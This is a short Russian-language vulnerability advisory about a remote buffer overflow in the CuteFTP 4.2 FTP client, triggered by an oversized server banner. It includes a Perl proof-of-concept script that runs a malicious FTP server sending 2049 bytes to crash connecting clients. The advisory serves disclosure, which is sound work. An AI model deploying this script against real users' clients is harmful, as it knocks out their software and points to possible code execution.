CuteFTP – популярный FTP клиент для Windows систем.
В программе обнаружена возможность удаленного переполнения буфера, которая может использоваться злонамеренным FTP сервером для выполнения произвольного кода на системе клиента. Переполнение происходит при получении FTP баннера большого размера (более 2048 Кб). Пример FTP сервера, который убивает клиентский CuteFTP: 

#!/usr/bin/perl 
use IO::Socket; 
$port = "21"; 
$data = "a"; 
$num = "2049"; 
$buf .= $data x $num; 
$server = IO::Socket::INET->new(LocalPort => $port, Type => SOCK_STREAM, 
Reuse => 1, Listen => 2) or die "Couldn't create ftp-server: $_\n"; 
while ($client = $server->accept()) { 
print "Client connected.\n"; 
print "Attacking..."; 
print $client "$buf"; 
print "OK\n"; 
close($client); 

#EOF 

Уязвимость найдена в CuteFTP v.4.2 и возможно в более новых версиях.
Уязвимость обнаружена D4rkGr3y из Damage Hacking Group.

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии